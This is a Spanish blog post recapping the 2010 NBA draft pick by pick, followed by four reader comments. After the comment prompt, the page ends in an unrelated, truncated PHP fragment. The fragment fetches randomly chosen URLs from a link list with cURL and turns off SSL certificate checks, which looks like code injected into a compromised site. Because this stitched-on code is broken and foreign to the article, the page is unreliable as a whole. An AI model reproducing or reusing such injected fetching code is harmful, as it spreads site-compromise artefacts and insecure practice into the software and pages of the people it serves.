La noche del draft

25 de June de 2010 por txusma

A las 19h en punto hora de la costa Este comenzaba el draft de la NBA. Fue una noche sin grandes emociones e increiblemente lenta. Un servidor puede dar fe de que a las 3h20 hora española solo se habían llevado a cabo 17 elecciones. Tras ver como los Bulls escogían a Kevin Seraphin, que se iba seguidamente a los Wizards, lo mejor era irse a dormir. Os presentamos un resumen de la noche del draft como si lo estuvierais viendo en directo. A ver si os gusta el experimento.

DRAFT 2010

Conectamos con el Madison Square Garden de New York donde de aquí a pocos minutos se iniciará el draft de la temporada 2010/2011. Se presenta una noche apasionante si hemos de tener en cuenta los numerosos rumores que circulan entre los GM. Luol Deng o Rudy Fernandez son algunos de los nombres que más aparecen y habrá que estar atentos de lo que acontezca en los próximos minutos para comprobar en qué equipo acabará jugando la siguiente temporada el español.

Lo que de momento sí se ha confirmado es que Kirk Hinrich se irá a los Wizards junto con la elección número 17. Con este movimiento los Bulls liberan 9 millones de dólares lo que les deja el hueco necesario para ofrecer el máximo a 2 agentes libres el próximo verano (comenzad a imaginar a Rose junto a Lebron y Bosh, por ejemplo…).

La otra noticia que ha asaltado el draft antes de su inicio es el despido de Kevin Pritchard tras 6 temporadas con los Blazers. Parece ser que había diferencias irreconciliables con el propietario de la franquicia, Paul Allen. Veremos como lo hace su sucesor. De momento, Pritchard continúa en la ceremonia del draft representando a Portland.

Y empieza el draft:

1. Washington Wizards – John Wall: Sin sorpresas. Los Wizards se hacen con un más que probable All Stars.

2. Philadelphia 76ers – Evan Turner: Todo sigue el guión previsto. ¿Esta elección implicará la salida de Iguodala o formarán un temible juego exterior junto a Jrue Holiday?

3. New Jersey Nets – Derrick Favors: Resuelta la primera incógnita de la noche. El interés por Wesley Johnson no ha sido más que una cortina de humo y Favors hará pareja con Lopez en el juego interior de los Nets.

4. Minnesota Timberwolves – Wesley Johnson: Siguiendo las previsiones, los Wolves se hacen con el jugador de Syracuse para el puesto de 3. Por favor, no os perdáis los pantalones que lleva.

5. Sacramento Kings – Demarcus Cousins: Los mocks siguen haciendo pleno. Como ya se ha comentado el gran problema del ala-pívot de Kentucky es su falta de madurez y algunas dudas sobre su condición física. Veremos si los Kings pueden manejarlo. De lograrlo habrán escogido a un pívot para muchos años. Se inicia una lucha entre él y Dalembert por el puesto de pívot titular. Pensando en el futuro la pareja Jason Thompson – Demarcus Cousins suena de fábula. Y con Tyreke Evans por fuera…

6. Golden State Warriors – Ekpe Udoh: Finalmente los Warriors se decantan por el jugador más mayor del draft por encima de Greg Monroe. Definitivamente al de Georgetown le han perjudicado mucho los malos workouts realizados. Udoh aportará una defensa interior que hace mucha falta en Golden State. De todas maneras no son pocas las voces que opinan que Golden State se ha equivocado.

7. Detroit Pistons – Greg Monroe: Estaba claro que si aún estaba disponible, Monroe sería la elección de Joe Dumars. Buen reboteador y pasador. Los aficionados de los Pistons pueden estar muy contentos.

8. Los Angeles Clippers – Al-Farouq Aminu: Hasta aquí todo relativamente tranquilo. En todo caso la duda estaba entre él y Luke Babbit y finalmente el de Wake Forest se ha llevado el gato al agua. Por cierto, uno de esos 3,5 que pueden por no acabar de definirse nunca. Pero también puede ser el nuevo Josh Smith… Impresionantes gafas.

9. Utah Jazz – Gordon Hayward: Primera sorpresa del draft. Todos esperaban a Ed Davis, que podría paliar la más que probable salida de Carlos Boozer, pero al final el héroe de Butler ha sido el elegido. Mucho riesgo en esta elección aunque puede compenetrarse muy bien con Deron Williams.

10. Indiana Pacers – Paul George: ¡Continúan las sorpresas! De Paul George dicen que puede ser uno de los mejores jugadores de este draft en 5 años pero es muy parecido a Danny Granger. Puede ser un verano movido en los Pacers con Brandon Rush, Mike Dunleavy o el propio Granger en el mercado.

11. New Orleans Hornets – Cole Aldrich (a Oklahoma City Thunder): Los Hornets seleccionan a Aldrich y a continuación hacen público que lo traspasan a los Thunder junto a Morris Peterson a cambio de los picks 18 y 21. No sé yo si Aldrich puede ser la referencia en la pintura que necesitan en Oklahoma. De hecho me recuerda bastante a Nick Collison pero con un poco más de altura.

12. Memphis Grizzlies – Xavier Henry: Jugador muy sólido, preparado para aportar desde ya y con buen tiro exterior. Una garantía en caso de que Rudy Gay abandone la franquicia. Su mayor problema es que no es capaz de crearse sus propios tiros pero con Zach Randolph y Marc Gasol por dentro y OJ Mayo por fuera seguro que no encontrará dificultades para encontrar buenas posiciones.

13. Toronto Raptors – Ed Davis: Posiblemente la elección de Udoh por GS le ha acabado perjudicando y cayendo hasta la decimotercera elección. Los Raptors ya tienen, salvando las distancias, el recambio de Chris Bosh. Tendrá que mejorar mucho su juego de media distancia y ponerse algo más fuerte.

14. Houston Rockets – Patrick Patterson: Yao irá entrando poco a poco en el equipo y mientras tanto el de Kentucky puede hacer un gran trabajo. A pesar de no hacer mucho ruído Patterson está muy bien considerado. De hecho, muchos aficionados de los Jazz lo hubieran escogido en lugar de Hayward.

15. Milwaukee Bucks – Larry Sanders: Pedíamos presencia interior para los Bucks y aquí la tenemos. Defensa, defensa y más defensa en este pívot procedente de VCommon.

16. Minnesota Timberwolves – Luke Babbit (a Portland Trail Blazers): Se las prometía muy felices el alero de Nevada pero al final ha acabado cayendo. Recuerda bastante a Luke Jackson en el aspecto de que a pesar de tener mucha calidad su falta de físico puede provocar que no sea ni un gran defensor ni pueda crearse sus propios tiros a nivel NBA. Los Wolves lo traspasan junto a Ryan Gomes a los Blazers a cambio de Martell Webster por lo que todo toma un poco más de sentido.

17. Chicago Bulls – Kevin Seraphin (a Washington Wizards): ¿Quién decía que este año no habría un europeo en primera ronda del draft? Otro buen jugador en defensa pero muy, muy verde en ataque. Seguramente tardará uno o dos años en dar el salto así que habrá que seguir la pista a su evolución.

18. Oklahoma City Thunder – Eric Bledsoe (a Los Angeles Clippers): El suplente de John Wall en Kentucky aparece escogido en primera ronda a pesar de haber estado en la sombra buena parte de la temporada. Muchos GM ven en él un nuevo Rajon Rondo. Los Thunder lo traspasan a los Clippers a cambio de una futura primera ronda. Que aprenda algo de Baron Davis.

19. Boston Celtics – Avery Bradley: Escolta con cuerpo de base, a lo Monta Ellis. Aportará anotación desde el banquillo de los Celtics lo que ya supone una importante mejora. Ha tenido suerte de caer en un equipo que no le obligará a jugar mucho de base pero que le permitirá ir aprendiendo conceptos básicos de esa posición. Defensivamente, la pareja Rondo-Bradley puede ser lo más.

20. San Antonio Spurs – James Anderson: Los Spurs siempre pescan petróleo en el draft a pesar de no disponer de grandes elecciones. Este año se hacen con un anotador compulsivo.

21. Oklahoma City Thunder – Craig Brackins (a New Orleans Hornets): Relativa sorpresa. No muchos apostaban por que el PF de Iowa State saliera en primera ronda. Cuajó una gran temporada rookie en la NCAA promediando 20 puntos y 9.5 rebotes por partido pero el año pasado decepcionó enormemente. David West ya tiene suplente.

22. Portland TrailBlazers – Elliot Williams: Pritchard podría haber saboteado la elección una vez sabido que tras el draft sería formalmente despedido pero ha escogido un jugador muy solido con un buen juego de media distancia. Desgraciadamente para él, Roy y Batum parecen cerrarle desde ya las puertas. No digo nada de Rudy porque ahora mismo parece más fuera que dentro.

23. Minnesota Timberwolves – Trevor Booker (a Washington Wizards): ¡Sorprendente elección! Primero porque Booker es un PF algo bajito que no aparecía en ninguna apuesta para la primera ronda y segundo porque los Wolves tienen esa posición bastante bien cubierta. El traspaso a los Wizards junto a la elección 56 a cambio de las elecciones 30 y 35 tiene algo de sentido.

24. Atlanta Hawks – Damion Jones (a los New Jersey Nets): Ha caído bastante Damion Jones. Es un SF buen defensor y buen anotador pero sin llegar a destacar en demasía en ninguno de los dos aspectos lo que le confiere un relativo riesgo. Los Hawks lo traspasan a los Nets cambio de la elección 27 y la 31.

25. Memphis Grizzlies – Dominique Jones (a Dallas Mavericks): A primera vista puede parecer demasiado pequeño para jugar de escolta pero cuando estira los brazos podemos observar lo largo que es. Un anotador capaz de promediar más de 35 puntos en 4 partidos consecutivos.

26. Oklahoma City Thunder – Quincy Podexter (a New Orleans Hornets): Este alero ha  mejorado mucho en su último año en la universidad lo que le ha valido ser escogido en primera ronda.

27. New Jersey Nets – Jordan Crawford (a Atlanta Hawks): Mucha gente lo conoce por ser el jugador que machacó por encima de Lebron James en una pachanga veraniega pero el de Xavier es bastante más que eso. Gran tirador, capaz de crearse sus propios tiros a veces olvida que juega con otros 4 compañeros. ¿Hablo de Jordan o Jamal Crawford? Veremos que pasa con ambos si Joe Johnson abandona la franquicia.

28. Memphis Grizzlies – Greivis Vazquez: Seguramente el jugador más feliz ahora mismo. Acaba de celebrar su elección con un gran abrazo a David Stern. Es un base alto, muy enérgico, con un gran tiro exterior pero algo lento. Puede ser un buen base suplente en la NBA.

29. Orlando Magic – Daniel Orton: Y salió el 5º jugador procedente de Kentucky lo que supone todo un logro y un récord histórico. En Orton tan solo se puede ver mucho potencial porque su temporada no ha sido muy brillante. ¿Qué planes tienen los Magic? ¿Traspasarán a Gortat?

30. Washington Wizards – Lazar Hayward (a Minnesota Timberwolves): Finaliza la primera ronda con un jugador que sonaba más para una segunda media. Intentará emular a Wesley Matheews y hacerse un hueco llegando de ninguna parte.

La segunda ronda mejor la dejamos porque seguro que incluso algún GM no conoce al jugador que draftea. En todo caso, algunos comentarios:

– El pívot alemán Tibor Pleiss ha sido escogido en primera posición aunque todos esperan que pasen muchos años antes de que pueda llegar a la NBA.

– Sacramento ha escogido a Hassan Whiteside con la elección global número 33 lo que supone una gran decepción para el pívot de Marshall. Debería haberse quedado un año más en la universidad.

– Los Knicks han escogido a Andy Rautins y Landry Fields lo que ha provocado sonoros abucheos en el Madison.

– Lance “Born Ready” Stephenson cae hasta la décima elección de la segunda ronda y luchará por convencer a Larry Bird. Escogido en segunda ronda el riesgo es menor y Stephenson podría dar más que una alegría a su equipo.

– Javis Varnado, que batió el récord de tapones en una temporada NBA ha sido escogido por los Heat.

– Los Lakers se hacen con Devin Ebanks, un alero muy atlético y defensivo pero que ofensivamente debería mejorar mucho. ¿Dará descanso a Artest?

– Paulo Prestes ha sido escogido por los Wolves.

– El compañero de Derrick Favors en Georgia Tech, Gani Lawal es escogido por los Suns en la 47ª elección. Buena decisión.

– Solomon Alabi cae de la primera ronda que le daban algunos mocks hasta la elección número 50. Los Mavs lo traspasan a los Raptors a cambio de una futura segunda ronda.

– Los Celtics se hacen con Luke Harangody que tiene una pinta de irlandés que no puede aguantar.

Comenta

4 comentarios a esta entrada

  1. Hynreck dice:
    #1

    “Os presentamos un resumen de la noche del draft como si lo estuvierais viendo en directo. A ver si os gusta el experimento.”

    Me daba miedo esta frase, pero lo has solventado muy bien Txus. Bravo. Buen análisis.
    Para mí, cagada de los Warriors con Udoh, no se suelen mover bien en los ultimos drafts cuando han tenido elecciones entre el 5 y el 12, solo se salva Curry, porque me vienen a la memoria los O´Bryant, Diogu, Pietrus…

      Citar

  2. D dice:
    #2

    Gran análisis Txusma!
    Gordon Hayward y Kyle korver no son demasiado parecidos para jugar los dos en Utah?

      Citar

  3. Dantley2 dice:
    #3

    Muy arriba Hayward.

    Muy rara la de Warriors, no parece cercana al estilo de un equipo de Nelson, quizá preparando el futuro de una manera más racional

      Citar

  4. Óscar dice:
    #4

    Yo creo que Hayward y Korver son compatibles. Y primero hay que confirmar que Kyle siga en los Jazz, es agente libre. Gordon es un 3 que puede jugar de 4 si quiere un equipo rápido. Tira bien, pero puede penetrar, postear y rebotea bien. Yo no creo que un #9 puesto sea alto, lo que me sorprendía es que no lo situasen en ese top-10.
    Increible lo diferente que ha sido este draft comparado con 2009. El año pasado hubo 10 bases (PG) entre los 21 primeros; este año, uno solo (eso sí, el nº1) entre los 33 primeros (!!), ya que tanto Eric Bledsoe como Vásquez son más escoltas que bases.
    Ha sorprendido el puesto sobre todo de Alabi (#50) y de Lawal (#46). Puede repetirse el caso de DeJuan Blair, aunque es difícil. Pensaba que Ed Davis (13) estaría entre los 7/8 primeros a pesar del añito que ha tenido. Y que Willie Warren cayese al puesto 54 no ha extrañado nada.
    Por lo demás, extraña la elección de Paul George como deciais por lo Pacers teniendo a Granger, pero estoy seguro de que van a buscar un traspaso incluyendo a George para hacerse con un base de primer nivel.
    En cuanto a mis Blazers, perfecta la maniobra para hacerse con Luke Babbitt, un gran tirador, y buenos picks
    los de Elliot Williams y de Armon Johnson, el primer base puro tras John Wall nada menos que en ese puesto 34… Pero perder a Webster no me ha gustado nada, por muy sólido que sea Ryan Gomes.
    Una apuesta: el rookie del año será… Blake Griffin.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>